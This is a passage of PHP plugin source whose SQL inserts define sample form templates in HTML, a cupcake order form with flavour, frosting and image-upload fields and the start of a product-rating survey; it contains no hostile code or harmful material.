id="5_label_sectionform_id_temp" class=""><span id="5_element_labelform_id_temp" class="label">E-mail:</span><span id="5_required_elementform_id_temp" class="required"> *</span></td><td valign="middle" align="left" id="5_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_submitter_mail" name="5_typeform_id_temp" id="5_typeform_id_temp"><input type="hidden" value="yes" name="5_requiredform_id_temp" id="5_requiredform_id_temp"><input type="hidden" value="no" name="5_sendform_id_temp" id="5_sendform_id_temp"><input type="hidden" value="" name="5_uniqueform_id_temp" id="5_uniqueform_id_temp"><input type="text" class="input_deactive" id="5_elementform_id_temp" name="5_elementform_id_temp" value="ex: myname@example.com" title="ex: myname@example.com" onfocus="delete_value(''5_elementform_id_temp'')" onblur="return_value(''5_elementform_id_temp'')" onchange="change_value(''5_elementform_id_temp'')" style="width: 200px;"></td></tr><tr id="14" type="type_phone"><td valign="top" align="left" id="14_label_sectionform_id_temp" class=""><span id="14_element_labelform_id_temp" class="label">Mobile/Phone Number:</span><span id="14_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="14_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_phone" name="14_typeform_id_temp" id="14_typeform_id_temp"><input type="hidden" value="no" name="14_requiredform_id_temp" id="14_requiredform_id_temp"><input type="hidden" value="" name="14_uniqueform_id_temp" id="14_uniqueform_id_temp"><table id="14_table_name" cellpadding="0" cellspacing="0"><tbody><tr id="14_tr_name1"><td id="14_td_name_input_first"><input type="text" class="input_deactive" id="14_element_firstform_id_temp" name="14_element_firstform_id_temp" value="" title="" onfocus="delete_value(&quot;14_element_firstform_id_temp&quot;)" onblur="return_value(&quot;14_element_firstform_id_temp&quot;)" onchange="change_value(''14_element_firstform_id_temp'')" onkeypress="return check_isnum(event)" style="width: 50px;"><span class="wdform_line" style="margin: 0px 4px; padding: 0px;">-</span></td><td id="14_td_name_input_last"><input type="text" class="input_deactive" id="14_element_lastform_id_temp" name="14_element_lastform_id_temp" value="" title="" onfocus="delete_value(&quot;14_element_lastform_id_temp&quot;)" onblur="return_value(&quot;14_element_lastform_id_temp&quot;)" onchange="change_value(''14_element_lastform_id_temp'')" onkeypress="return check_isnum(event)" style="width: 135px;"></td></tr><tr id="14_tr_name2"><td id="14_td_name_label_first" align="left"><label class="mini_label" id="14_mini_label_area_code">Area Code</label></td><td id="14_td_name_label_last" align="left"><label class="mini_label" id="14_mini_label_phone_number">Phone Number</label></td></tr></tbody></table></td></tr><tr id="7" type="type_paypal_checkbox"><td valign="top" align="left" id="7_label_sectionform_id_temp" class=""><span id="7_element_labelform_id_temp" class="label">Cupcakes Flavors (1 doz. minimum)</span><span id="7_required_elementform_id_temp" class="required"> *</span></td><td valign="top" align="left" id="7_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_paypal_checkbox" name="7_typeform_id_temp" id="7_typeform_id_temp"><input type="hidden" value="yes" name="7_requiredform_id_temp" id="7_requiredform_id_temp"><input type="hidden" value="no" name="7_randomizeform_id_temp" id="7_randomizeform_id_temp"><input type="hidden" value="no" name="7_allow_otherform_id_temp" id="7_allow_otherform_id_temp"><input type="hidden" value="0" name="7_allow_other_numform_id_temp" id="7_allow_other_numform_id_temp"><table><tbody id="7_table_little"><tr id="7_element_tr0"><td valign="top" id="7_td_little0" idi="0"><input type="checkbox" id="7_elementform_id_temp0" name="7_elementform_id_temp0" value="15" onclick="set_checked(''7'',''0'',''form_id_temp'')"><label id="7_label_element0" class="ch_rad_label" for="7_elementform_id_temp0">Red Velvet ($15.00)</label><input type="hidden" id="7_elementlabel_form_id_temp0" name="7_elementform_id_temp0_label" value="Red Velvet ($15.00)"></td></tr><tr id="7_element_tr1"><td valign="top" id="7_td_little1" idi="1"><input type="checkbox" id="7_elementform_id_temp1" name="7_elementform_id_temp1" value="10" onclick="set_checked(''7'',''1'',''form_id_temp'')"><label id="7_label_element1" class="ch_rad_label" for="7_elementform_id_temp1">Vanilla ($10.00)</label><input type="hidden" id="7_elementlabel_form_id_temp1" name="7_elementform_id_temp1_label" value="Vanilla ($10.00)"></td></tr><tr id="7_element_tr2"><td valign="top" id="7_td_little2" idi="2"><input type="checkbox" id="7_elementform_id_temp2" name="7_elementform_id_temp2" value="12" onclick="set_checked(''7'',''2'',''form_id_temp'')"><label id="7_label_element2" class="ch_rad_label" for="7_elementform_id_temp2">Chocolate ($12.00)</label><input type="hidden" id="7_elementlabel_form_id_temp2" name="7_elementform_id_temp2_label" value="Chocolate ($12.00)"></td></tr><tr id="7_element_tr3"><td valign="top" id="7_td_little3" idi="3"><input type="checkbox" id="7_elementform_id_temp3" name="7_elementform_id_temp3" value="15" onclick="set_checked(''7'',''3'',''form_id_temp'')"><label id="7_label_element3" class="ch_rad_label" for="7_elementform_id_temp3">Guinness ($15.00)</label><input type="hidden" id="7_elementlabel_form_id_temp3" name="7_elementform_id_temp3_label" value="Guinness ($15.00)"></td></tr><tr id="7_element_tr4"><td valign="top" id="7_td_little4" idi="4"><input type="checkbox" id="7_elementform_id_temp4" name="7_elementform_id_temp4" value="12" onclick="set_checked(''7'',''4'',''form_id_temp'')"><label id="7_label_element4" class="ch_rad_label" for="7_elementform_id_temp4">Coconut ($12.00)</label><input type="hidden" id="7_elementlabel_form_id_temp4" name="7_elementform_id_temp4_label" value="Coconut ($12.00)"></td></tr><tr id="7_element_tr5"><td valign="top" id="7_td_little5" idi="5"><input type="checkbox" id="7_elementform_id_temp5" name="7_elementform_id_temp5" value="10" onclick="set_checked(''7'',''5'',''form_id_temp'')"><label id="7_label_element5" class="ch_rad_label" for="7_elementform_id_temp5">Lemon ($10.00)</label><input type="hidden" id="7_elementlabel_form_id_temp5" name="7_elementform_id_temp5_label" value="Lemon ($10.00)"></td></tr><tr id="7_element_tr6"><td valign="top" id="7_td_little6" idi="6"><input type="checkbox" id="7_elementform_id_temp6" name="7_elementform_id_temp6" value="120" onclick="set_checked(''7'',''6'',''form_id_temp'')"><label id="7_label_element6" class="ch_rad_label" for="7_elementform_id_temp6">Chocolate Mint ($12.00)</label><input type="hidden" id="7_elementlabel_form_id_temp6" name="7_elementform_id_temp6_label" value="Chocolate Mint ($12.00)"></td></tr></tbody></table><div id="7_divform_id_temp"><span id="7_element_quantity_spanform_id_temp" style="margin-right: 15px;"><label class="mini_label" id="7_element_quantity_label_form_id_temp" style="margin-right: 5px;"><!--repstart-->Quantity<!--repend--></label><input type="text" value="1" id="7_element_quantityform_id_temp" name="7_element_quantityform_id_temp" onkeypress="return check_isnum(event)" onchange="change_value(''7_element_quantityform_id_temp'', this.value)" style="width: 30px; margin: 2px 0px;"></span><span id="7_property_0" style="margin-right: 15px;"><label class="mini_label" id="7_property_label_form_id_temp0" style="margin-right: 5px;">Cupcake Size</label><select id="7_propertyform_id_temp0" name="7_propertyform_id_temp0" type="null" style="width: auto; margin: 2px 0px;"><option id="7_0_option0" value="Regular(yield - 12 cupcakes)">Regular(yield - 12 cupcakes)</option><option id="7_0_option1" value="Small (yield - 24 cupcakes)">Small (yield - 24 cupcakes)</option><option id="7_0_option2" value="Mini (yield - 48 cupcakes)">Mini (yield - 48 cupcakes)</option></select></span></div></td></tr><tr id="8" type="type_paypal_radio"><td valign="top" align="left" id="8_label_sectionform_id_temp" class=""><span id="8_element_labelform_id_temp" class="label">Choose your butter cream frosting:</span><span id="8_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="8_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_paypal_radio" name="8_typeform_id_temp" id="8_typeform_id_temp"><input type="hidden" value="no" name="8_requiredform_id_temp" id="8_requiredform_id_temp"><input type="hidden" value="no" name="8_randomizeform_id_temp" id="8_randomizeform_id_temp"><input type="hidden" value="no" name="8_allow_otherform_id_temp" id="8_allow_otherform_id_temp"><table><tbody id="8_table_little"><tr id="8_element_tr0"><td valign="top" id="8_td_little0" idi="0"><input type="radio" id="8_elementform_id_temp0" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''0'',''form_id_temp'')"><label id="8_label_element0" class="ch_rad_label" for="8_elementform_id_temp0">Vanilla</label><input type="hidden" id="8_elementlabel_form_id_temp0" name="8_elementform_id_temp0_label" value="Vanilla"></td></tr><tr id="8_element_tr1"><td valign="top" id="8_td_little1" idi="1"><input type="radio" id="8_elementform_id_temp1" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''1'',''form_id_temp'')"><label id="8_label_element1" class="ch_rad_label" for="8_elementform_id_temp1">Chocolate</label><input type="hidden" id="8_elementlabel_form_id_temp1" name="8_elementform_id_temp1_label" value="Chocolate"></td></tr><tr id="8_element_tr2"><td valign="top" id="8_td_little2" idi="2"><input type="radio" id="8_elementform_id_temp2" name="8_elementform_id_temp" value="3" onclick="set_default(''8'',''2'',''form_id_temp'')"><label id="8_label_element2" class="ch_rad_label" for="8_elementform_id_temp2">Cream Cheese - add $3.00</label><input type="hidden" id="8_elementlabel_form_id_temp2" name="8_elementform_id_temp2_label" value="Cream Cheese - add $3.00"></td></tr><tr id="8_element_tr3"><td valign="top" id="8_td_little3" idi="3"><input type="radio" id="8_elementform_id_temp3" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''3'',''form_id_temp'')"><label id="8_label_element3" class="ch_rad_label" for="8_elementform_id_temp3">Salted Caramel</label><input type="hidden" id="8_elementlabel_form_id_temp3" name="8_elementform_id_temp3_label" value="Salted Caramel"></td></tr><tr id="8_element_tr4"><td valign="top" id="8_td_little4" idi="4"><input type="radio" id="8_elementform_id_temp4" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''4'',''form_id_temp'')"><label id="8_label_element4" class="ch_rad_label" for="8_elementform_id_temp4">Guinness</label><input type="hidden" id="8_elementlabel_form_id_temp4" name="8_elementform_id_temp4_label" value="Guinness"></td></tr><tr id="8_element_tr5"><td valign="top" id="8_td_little5" idi="5"><input type="radio" id="8_elementform_id_temp5" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''5'',''form_id_temp'')"><label id="8_label_element5" class="ch_rad_label" for="8_elementform_id_temp5">Almond</label><input type="hidden" id="8_elementlabel_form_id_temp5" name="8_elementform_id_temp5_label" value="Almond"></td></tr><tr id="8_element_tr6"><td valign="top" id="8_td_little6" idi="6"><input type="radio" id="8_elementform_id_temp6" name="8_elementform_id_temp" value="0" onclick="set_default(''8'',''6'',''form_id_temp'')"><label id="8_label_element6" class="ch_rad_label" for="8_elementform_id_temp6">Coconut</label><input type="hidden" id="8_elementlabel_form_id_temp6" name="8_elementform_id_temp6_label" value="Coconut"></td></tr></tbody></table><div id="8_divform_id_temp"></div></td></tr><tr id="9" type="type_textarea"><td valign="top" align="left" id="9_label_sectionform_id_temp" class=""><span id="9_element_labelform_id_temp" class="label">Details (if any):</span><span id="9_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="9_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_textarea" name="9_typeform_id_temp" id="9_typeform_id_temp"><input type="hidden" value="no" name="9_requiredform_id_temp" id="9_requiredform_id_temp"><input type="hidden" value="no" name="9_uniqueform_id_temp" id="9_uniqueform_id_temp"><textarea class="input_deactive" id="9_elementform_id_temp" name="9_elementform_id_temp" title="for example: pink frosting with silver pearls" value="for example: pink frosting with silver pearls" onfocus="delete_value(''9_elementform_id_temp'')" onblur="return_value(''9_elementform_id_temp'')" onchange="change_value(''9_elementform_id_temp'')" style="width: 200px; height: 100px;">for example: pink frosting with silver pearls</textarea></td></tr><tr id="10" type="type_file_upload"><td colspan="2" id="10_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="10_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="10_label_sectionform_id_temp" class=""><span id="10_element_labelform_id_temp" class="label">Upload an image of cupcakes you like so that I can have an idea of what you want. </span><span id="10_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="10_element_sectionform_id_temp" class=""><input type="hidden" value="type_file_upload" name="10_typeform_id_temp" id="10_typeform_id_temp"><input type="hidden" value="no" name="10_requiredform_id_temp" id="10_requiredform_id_temp"><input type="hidden" value="***max_sizeskizb10***2000***max_sizeverj10***" id="10_max_size" name="10_max_size"><input type="hidden" value="***destinationskizb10***{$plugin_path}/uploads***destinationverj10***" id="10_destination" name="10_destination"><input type="hidden" value="***extensionskizb10***jpg, jpeg, png, gif***extensionverj10***" id="10_extension" name="10_extension"><input type="file" class="file_upload" id="10_elementform_id_temp" name="10_fileform_id_temp"></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr id="11" class="wdform_tr_section_break" type="type_section_break"><td id="11_element_sectionform_id_temp" align="left" valign="top" colspan="100" class="toolbar_padding"><p style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;" data-mce-style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;"><strong><span style="font-family: helvetica; font-size: small; color: #ff00ff;" data-mce-style="font-family: helvetica; font-size: small; color: #ff00ff;"><em>Your order total and order number will be communicated via email. Orders outside of Trinidad will be cancelled.&nbsp;</em></span></strong></p><p style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;" data-mce-style="color: #212121; font-family: Helvetica; font-size: 13px; line-height: 18px;"><span style="font-family: helvetica; color: #000000; font-size: small;" data-mce-style="font-family: helvetica; color: #000000; font-size: small;"><strong>Themed orders will incur an additional cost...</strong></span></p></td></tr><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="12" type="type_submit_reset"><td colspan="2" class="toolbar_padding" id="12_label_and_element_sectionform_id_temp"><table id="12_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="12_label_sectionform_id_temp" class="" style="display: none;"><span id="12_element_labelform_id_temp" style="display: none;">type_submit_reset_12</span></td><td valign="middle" align="left" id="12_element_sectionform_id_temp" class=""><input type="hidden" value="type_submit_reset" name="12_typeform_id_temp" id="12_typeform_id_temp"><button type="button" class="button_submit" id="12_element_submitform_id_temp" value="Submit" onclick="check_required(''submit'', ''form_id_temp'');">Submit</button><button type="button" class="button_reset" id="12_element_resetform_id_temp" value="Reset" onclick="check_required(''reset'');" style="display: none;">Reset</button></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr class="wdform_footer"><td colspan="100" valign="top"><table width="100%" style="padding-right:170px"><tbody><tr id="form_id_temppage_nav1"></tr></tbody></table></td></tr></tbody></table>', 10, '// before form is load\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// before form submit\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// before form reset\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 1, '<p>%all%</p>', '<p>%all%</p>', 21, '1#**id**#Choose your date for pick up:#**label**#type_date#****#16#**id**#Time:#**label**#type_time#****#13#**id**#Full Name:#**label**#type_name#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#14#**id**#Mobile/Phone Number:#**label**#type_phone#****#7#**id**#Cupcakes Flavors (1 doz. minimum)#**label**#type_paypal_checkbox#****#8#**id**#Choose your butter cream frosting:#**label**#type_paypal_radio#****#9#**id**#Details (if any):#**label**#type_textarea#****#10#**id**#Upload an image of cupcakes you like so that I can have an idea of what you want. #**label**#type_file_upload#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#20#**id**#Total:#**label**#type_paypal_total#****#19#**id**#Total:#**label**#type_paypal_total#****#17#**id**#Martix:#**label**#type_matrix#****#18#**id**#Total:#**label**#type_paypal_total#****#2#**id**#Time:#**label**#type_time#****#3#**id**#Full Name:#**label**#type_name#****#6#**id**#Mobile/Phone Number:#**label**#type_phone#****#4#**id**#Birth Date:#**label**#type_date_fields#****##**id**##**label**##****#', '1#**id**#Choose your date for pick up:#**label**#type_date#****#16#**id**#Time:#**label**#type_time#****#13#**id**#Full Name:#**label**#type_name#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#14#**id**#Mobile/Phone Number:#**label**#type_phone#****#7#**id**#Cupcakes Flavors (1 doz. minimum)#**label**#type_paypal_checkbox#****#8#**id**#Choose your butter cream frosting:#**label**#type_paypal_radio#****#9#**id**#Details (if any):#**label**#type_textarea#****#10#**id**#Upload an image of cupcakes you like so that I can have an idea of what you want. #**label**#type_file_upload#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#', 0, 'none', 'false', 'true', '', '', '', 0, 'testmode', '', 'USD', 0, '', '', '', '', '', '');
HEREQUERYFORM;
    $form_maker_rows12 = <<<HEREQUERYFORM
    INSERT INTO `{$table_name}` (`title`, `mail`, `form`, `form_front`, `theme`, `javascript`, `submit_text`, `url`, `submit_text_type`, `script_mail`, `script_mail_user`, `counter`, `label_order`, `label_order_current`, `article_id`, `pagination`, `show_title`, `show_numbers`, `public_key`, `private_key`, `recaptcha_theme`, `paypal_mode`, `checkout_mode`, `paypal_email`, `payment_currency`, `tax`, `from_mail`, `from_name`, `script1`, `script2`, `script_user1`, `script_user2`) VALUES
    ('Product Survey', '', '<table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-width: 1px; border-top-style: solid; border-top-color: black;"><tbody id="form_id_tempform_view1" class="wdform_tbody1" page_title="Product Rating" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"></tbody></table></td></tr><tr id="2" class="wdform_tr_section_break" type="type_section_break"><td id="2_element_sectionform_id_temp" align="left" valign="top" colspan="100" class="toolbar_padding"><h1 class="sg-title" style="font-size: 2.2em; color: #fff; font-weight: normal; line-height: normal;" data-mce-style="font-size: 2.2em; color: #fff; font-weight: normal; line-height: normal;">Product Survey</h1></td><td id="X_2" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_section_break(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="edit_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"><span id="2_element_labelform_id_temp" style="display: none;">custom_2</span></td><td id="dublicate_2" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;2&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="1" type="type_matrix"><td colspan="2" id="1_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="1_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="1_label_sectionform_id_temp" class="wdform_matrix"><span id="1_element_labelform_id_temp" class="label">1. Please indicate if you agree or disagree with the following statements</span><span id="1_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="1_element_sectionform_id_temp" class="wdform_matrix"><input type="hidden" value="type_matrix" name="1_typeform_id_temp" id="1_typeform_id_temp"><input type="hidden" value="no" name="1_requiredform_id_temp" id="1_requiredform_id_temp"><input type="hidden" value="radio" name="1_input_typeform_id_temp" id="1_input_typeform_id_temp"><table id="1_elementform_id_temp"><tbody id="1_table_little"><tr id="1_element_tr0"><td id="1_element_td0_0"></td><td id="1_element_td0_1" class="matrix_" style="\r\n    text-align: center;\r\n"><label id="1_label_elementform_id_temp0_1" name="1_label_elementform_id_temp0_1" class="ch_rad_label" for="1_elementform_id_temp1">Strongly Disagree</label></td><td id="1_element_td0_2" class="matrix_"><label id="1_label_elementform_id_temp0_2" name="1_label_elementform_id_temp0_2" class="ch_rad_label" for="1_elementform_id_temp2">Disagree</label></td><td id="1_element_td0_3" class="matrix_"><label id="1_label_elementform_id_temp0_3" name="1_label_elementform_id_temp0_3" class="ch_rad_label" for="1_elementform_id_temp3">Neutral</label></td><td id="1_element_td0_4" class="matrix_"><label id="1_label_elementform_id_temp0_4" name="1_label_elementform_id_temp0_4" class="ch_rad_label" for="1_elementform_id_temp4">Agree</label></td><td id="1_element_td0_5" class="matrix_"><label id="1_label_elementform_id_temp0_5" name="1_label_elementform_id_temp0_5" class="ch_rad_label" for="1_elementform_id_temp5">Strongly Agree</label></td></tr><tr id="1_element_tr1"><td id="1_element_td1_0" class="matrix_"><label id="1_label_elementform_id_temp1_0" class="ch_rad_label" for="1_elementform_id_temp1">Product is affordable</label></td><td id="1_element_td1_1" style="text-align: center;" align="center"><input id="1_input_elementform_id_temp1_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_1"></td><td id="1_element_td1_2" style="text-align: center;"><input id="1_input_elementform_id_temp1_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_2"></td><td id="1_element_td1_3" style="text-align: center;"><input id="1_input_elementform_id_temp1_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_3"></td><td id="1_element_td1_4" style="text-align: center;"><input id="1_input_elementform_id_temp1_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_4"></td><td id="1_element_td1_5" style="text-align: center;"><input id="1_input_elementform_id_temp1_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp1" value="1_5"></td></tr><tr id="1_element_tr2"><td id="1_element_td2_0" class="matrix_"><label id="1_label_elementform_id_temp2_0" class="ch_rad_label" for="1_elementform_id_temp2">Product is valuable</label></td><td id="1_element_td2_1" style="text-align: center;"><input id="1_input_elementform_id_temp2_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_1"></td><td id="1_element_td2_2" style="text-align: center;"><input id="1_input_elementform_id_temp2_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_2"></td><td id="1_element_td2_3" style="text-align: center;"><input id="1_input_elementform_id_temp2_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_3"></td><td id="1_element_td2_4" style="text-align: center;"><input id="1_input_elementform_id_temp2_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_4"></td><td id="1_element_td2_5" style="text-align: center;"><input id="1_input_elementform_id_temp2_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp2" value="2_5"></td></tr><tr id="1_element_tr3"><td id="1_element_td3_0" class="matrix_"><label id="1_label_elementform_id_temp3_0" class="ch_rad_label" for="1_elementform_id_temp3">Product is better<br> than other products on<br> the market</label></td><td id="1_element_td3_1" style="text-align: center;"><input id="1_input_elementform_id_temp3_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_1"></td><td id="1_element_td3_2" style="text-align: center;"><input id="1_input_elementform_id_temp3_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_2"></td><td id="1_element_td3_3" style="text-align: center;"><input id="1_input_elementform_id_temp3_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_3"></td><td id="1_element_td3_4" style="text-align: center;"><input id="1_input_elementform_id_temp3_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_4"></td><td id="1_element_td3_5" style="text-align: center;"><input id="1_input_elementform_id_temp3_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp3" value="3_5"></td></tr><tr id="1_element_tr4"><td id="1_element_td4_0" class="matrix_"><label id="1_label_elementform_id_temp4_0" class="ch_rad_label" for="1_elementform_id_temp4">Product is easy to use</label></td><td id="1_element_td4_1" style="text-align: center;"><input id="1_input_elementform_id_temp4_1" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_1"></td><td id="1_element_td4_2" style="text-align: center;"><input id="1_input_elementform_id_temp4_2" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_2"></td><td id="1_element_td4_3" style="text-align: center;"><input id="1_input_elementform_id_temp4_3" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_3"></td><td id="1_element_td4_4" style="text-align: center;"><input id="1_input_elementform_id_temp4_4" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_4"></td><td id="1_element_td4_5" style="text-align: center;"><input id="1_input_elementform_id_temp4_5" align="center" size="14" type="radio" name="1_input_elementform_id_temp4" value="4_5"></td></tr></tbody></table><input id="1_hidden_rowform_id_temp" name="1_hidden_rowform_id_temp" type="hidden" value="Product is affordable***Product is valuable***Product is better&lt;br&gt; than other products on&lt;br&gt; the market***Product is easy to use***"><input id="1_row_idsform_id_temp" name="1_row_idsform_id_temp" type="hidden" value="1,2,3,4,"><input id="1_hidden_columnform_id_temp" name="1_hidden_columnform_id_temp" type="hidden" value="Strongly Disagree***Disagree***Neutral***Agree***Strongly Agree***"><input id="1_column_idsform_id_temp" name="1_column_idsform_id_temp" type="hidden" value="1,2,3,4,5,"></td></tr></tbody></table></td><td id="X_1" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="3" type="type_scale_rating"><td colspan="2" id="3_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="3_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="3_label_sectionform_id_temp" class="wdform_scale_rating"><span id="3_element_labelform_id_temp" class="label">2. How likely are you to recommend [Product/Service] to a friend or co-worker?</span><span id="3_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="3_element_sectionform_id_temp" class="wdform_scale_rating"><input type="hidden" value="type_scale_rating" name="3_typeform_id_temp" id="3_typeform_id_temp"><input type="hidden" value="no" name="3_requiredform_id_temp" id="3_requiredform_id_temp"><input type="hidden" value="5" id="3_scale_amountform_id_temp" name="3_scale_amountform_id_temp"><div id="3_elementform_id_temp" style="float: left;"><label class="mini_label" id="3_mini_label_worst" style="position: relative; top: 6px; font-size: 11px;">Will not recommend </label><table id="3_scale_tableform_id_temp" style="display: inline-table;"><tbody><tr id="3_scale_tr1form_id_temp"><td id="3_scale_td1_1form_id_temp" style="text-align: center;"><span>1</span></td><td id="3_scale_td1_2form_id_temp" style="text-align: center;"><span>2</span></td><td id="3_scale_td1_3form_id_temp" style="text-align: center;"><span>3</span></td><td id="3_scale_td1_4form_id_temp" style="text-align: center;"><span>4</span></td><td id="3_scale_td1_5form_id_temp" style="text-align: center;"><span>5</span></td></tr><tr id="3_scale_tr2form_id_temp"><td id="3_scale_td2_1form_id_temp"><input id="3_scale_radioform_id_temp_1" name="3_scale_radioform_id_temp" value="1" type="radio"></td><td id="3_scale_td2_2form_id_temp"><input id="3_scale_radioform_id_temp_2" name="3_scale_radioform_id_temp" value="2" type="radio"></td><td id="3_scale_td2_3form_id_temp"><input id="3_scale_radioform_id_temp_3" name="3_scale_radioform_id_temp" value="3" type="radio"></td><td id="3_scale_td2_4form_id_temp"><input id="3_scale_radioform_id_temp_4" name="3_scale_radioform_id_temp" value="4" type="radio"></td><td id="3_scale_td2_5form_id_temp"><input id="3_scale_radioform_id_temp_5" 